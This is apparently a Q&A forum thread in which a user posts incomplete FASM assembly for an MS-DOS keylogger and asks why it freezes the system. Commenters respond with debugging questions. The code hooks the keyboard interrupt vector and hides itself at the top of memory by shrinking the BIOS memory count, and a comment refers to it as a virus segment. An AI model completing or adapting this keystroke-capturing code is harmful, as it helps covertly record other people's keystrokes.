0

I make a keylogger in Fasm for MS-DOS however when i run that freeze my computer because are some thing wrong at segment:offset memory used by my keylogger. This is the source that i code:

cli
push es
mov ax,0
mov es,ax
es
mov bx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
PUSH DS
MOV BP,40H
MOV DS,BP
ds
dec word [13h]    ;Memory less by 1K
POP DS
int 12h         ;memory into AX
mov cl,6     ;because memory is in K
shl ax,cl
mov bp,ax ;ES is the virus segmentes
es
mov [24h],bx
es
mov [26h],bp
pop es
sti
push    es
mov             si,bp
mov             es,si
mov             si,code         
mov             di,0
mov  cx,codesize-code

repz
movsb
pop             es
push    es
mov             si,bp
mov             es,si
mov             si,keys         
mov      di,codesize-code+1024
mov             cx,36h
repz
movsb
pop             es
push            es
mov             ax,bp
mov             es,ax
mov             ax,codesize
mov             bx,codesize
mov             es,bp
es
mov             [bx],ax
pop             es
ret
code:
pushf
pushaw
sti
IN              AL,60H
mov             al,20h
out             20h,al
pop             es
pop             ds
popaw
popf
iret
keys db '',0
codesize:
buf db 1024 dup (0)   
iret

If i use the segment:offset 2000:0 to store my Int 9 handler this application works fine however if i use the int 12h to get an memory segment to put the keylogger the MS-DOS freeze. Then what is wrong at my source above?

Bernhard Eriksson
  • 471
  • 3
  • 11
B. Salvador
  • 11
  • 4
  • Your code is hard to read because it is neither indented well nor commented in a useful way. You might receive better answers if you fix both of these issues. – fuz Aug 29 '18 at 11:47
  • `mov [24h],bx` looks odd given that BX is the offset of the original Int 9 routine loaded near the beginning – Michael Petch Aug 29 '18 at 12:28
  • Yes, this is a COM application and on first line is org 100h. How can i know the memory segment to initialize my `[26h]` segment? – B. Salvador Aug 29 '18 at 12:29
  • I already wrote this: `XOR bx,bx` `es` `mov [24h],bx` – B. Salvador Aug 29 '18 at 12:31
  • There is no xor bx, bx in this code. – Michael Petch Aug 29 '18 at 12:36
  • I asked you previously to show us your complete code, and even after the edit it still isn't complete. Please make this an [mcve]. The `org 100h` doesn't appear. and I don't see this `xor bx, bx` at all. You sure you are showing us the code you are using? – Michael Petch Aug 29 '18 at 12:38
  • If writing a DOS TSR you really should be looking at [Int 21h/AX=3100h](http://www.ctyme.com/intr/rb-2723.htm) – Michael Petch Aug 29 '18 at 12:43

0 Answers0